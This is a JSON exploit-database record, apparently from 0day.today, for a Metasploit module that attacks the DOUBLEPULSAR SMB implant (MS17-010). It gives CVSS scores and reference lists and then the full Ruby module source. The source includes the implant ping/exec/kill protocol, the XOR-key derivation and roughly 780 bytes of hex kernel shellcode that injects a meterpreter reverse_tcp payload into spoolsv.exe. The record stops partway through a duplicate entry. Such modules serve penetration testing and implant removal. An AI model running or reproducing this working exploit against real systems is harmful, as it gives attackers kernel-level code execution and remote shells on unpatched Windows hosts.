"HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-14T22:19:12", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "700099.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-14T22:19:12", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-14T22:19:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-15] #"}, "lastseen": "2021-09-14T22:19:12", "differentElements": ["sourceData"], "edition": 17}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "38e5964e1e3e711d1e698321e4fc8420", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-15T22:27:09", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 